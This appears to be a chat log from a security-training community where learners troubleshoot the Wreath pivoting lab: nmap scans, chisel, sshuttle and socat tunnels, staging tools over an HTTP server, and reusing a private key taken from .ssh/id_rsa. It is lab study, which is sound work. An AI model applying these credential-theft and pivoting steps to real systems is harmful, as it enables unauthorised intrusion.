Honestly, I had to reset my work like 3-4 times over the course of the few days I worked on Wreath. Boxes would go offline without warning on occasion, after a while, you can get the groundwork down in like 10 minutes, because all you have to do is swap up some IP addresses.

grizzled river
#

Could you help me with homework number 11 please? I understand even the step of activating the ssh server of the attacking machine, from then on I do not understand what I should do, and the support video for this class is not clear since the person in the video does not show in a practical way how to execute the task instructions.

gleaming rapids
outer umbra
#

Just read through that section, and be ready to refer back to it, especially as you compromise the second box and get to the third. Off the top, I referred back to that section for the sshuttle, socat, and chisel sections, although the other options offer alternative pivoting approaches.

grizzled river
#

thank you

hollow grail
#

Hi, I'm doing wreath. All my local setup are working but I can't ping the target machine. Can anyone help me ?

outer umbra
open tartan
#

hello, anyone around here?

#

I did nmap scan on prod-serv. Backend web-server 10.200.90.150 has open ports.

#

I did pivoting with chisel. I am sure it is properly configured.

Question : Why it is not giving results with nmap from kali.

#

I also tried to open it on firefox. It is not reachable.

#

What am I doing wrong here? @me while replying. (:

strange bison
open tartan
#

and netstat -tunlp also shows port 1080 is open locally.

#

what else I should check?

unkempt hawk
#

hello i cant download nmap binary from attack machine

#

200 status code on python http server

#

but curl stuck at 0%

#

and today I cant connect to public facing machine using private key leech from .ssh/id_rsa. Port 22 still open but not response

open tartan
open tartan
open tartan
unkempt hawk
#

sr but I dont see upload button πŸ˜‚

#

how can I share the screenshot?

ancient oasis
#

you'll have to verify your profille

#

!docs verify

thin crescentBOT
open tartan
#

why I am getting this warning ?

#

is this something I should care about ?

outer umbra
#

Lol, I'm not sure, but I can appreciate it being a tad unnerving. Did that pop up immediately, or was it while you were doing something?

open tartan
#

this warning didn't interrupt my work. So I was good doing stuff. (:

outer umbra
#

Lol, good stuff. For all I know, I got the same warning, but if it doesn't interrupt me, I wouldn't even know it happened.

surreal sail
#

!notifyme